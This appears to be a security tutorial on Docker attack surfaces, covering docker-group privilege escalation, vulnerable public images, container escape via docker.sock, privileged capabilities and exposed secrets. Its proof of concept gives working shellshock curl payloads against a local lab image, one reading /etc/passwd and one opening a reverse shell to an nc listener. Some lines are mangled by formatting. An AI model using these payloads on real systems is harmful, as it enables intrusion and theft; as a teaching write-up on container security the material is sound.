A significant amount of risks with it when not properly used users who are part of the docker group can elevate their privileges to root.
As you can notice there are containers being run inside the cluster, we should focus on the full cluster attack surface.
There are two possible ways to attack a docker –
- External attacks
- Malicious insiders
The internal users who are part of the docker group can easily gain root access to the host.
Docker images are downloaded from public repos such as docker hub.
Enterprises typically use private repos.
There is a possibility that these publicly available docker images can have publicly known vulnerabilities.
Quick POC –
We are running a shellshock vulnerable image in our docker and see how we can exploit this
sudo docker run --rm -it -p 8082:80 vulnerables/cve-2014-6271
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" [<http://localhost:8082/cgi-bin/vulnerable>](<http://localhost:8082/cgi-bin/vulnerable>)
Lets have a reverse shell –
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'bash -i >& /dev/tcp/172.17.0.1/4444' " http://localhost:8082/cgi-bin/vulnerable(<http://localhost:8082/cgi-bin/vulnerablenew tab - nc -nlvp 4444The IP address of docker0 interface- check by ifconfig & port of listener for our shell
Mitigation – Dockerscan is a tool that helps detect backdoors in a docker image.
https://github.com/cr0hn/dockerscan
Once an attacker lands on the container the next goal is to escape the container and gain access.
An attacker will use various techniques like Existing exploits, unpatched docker environments, Overpriviledged containers, Mounting dangerous mount points, etc.
docker.sock
A Docker socket is a UNIX socket, which is a backbone for managing containers.
When we type docker commands using docker CLI client, it interacts with docker daemon using the UNIX socket. This socket can be exposed over the network on a specific port – HTTP API
UNIX socket is the default setting, Mounting /var/run/docker.sock into the container is dangerous.
β privileged flag
When a privileged flag is used with a container, it provides all Linux capabilities to the container.
cap_sys_admin, cap_sys_ptrace, and cap_sys_module are some of the dangerous capabilities to name.
When an attacker gains a shell on the container and if it has cap_sys_module enabled, it is possible to load a kernel module directly onto the hostβs kernel from within the container.
Accessing Secrets
Secrets are usually kept in places such as environment variables or within the source code.
Anyone with access to the container can easily read these secrets. A user with privileged access on the host can also access secrets residing inside the container – docker inspects away.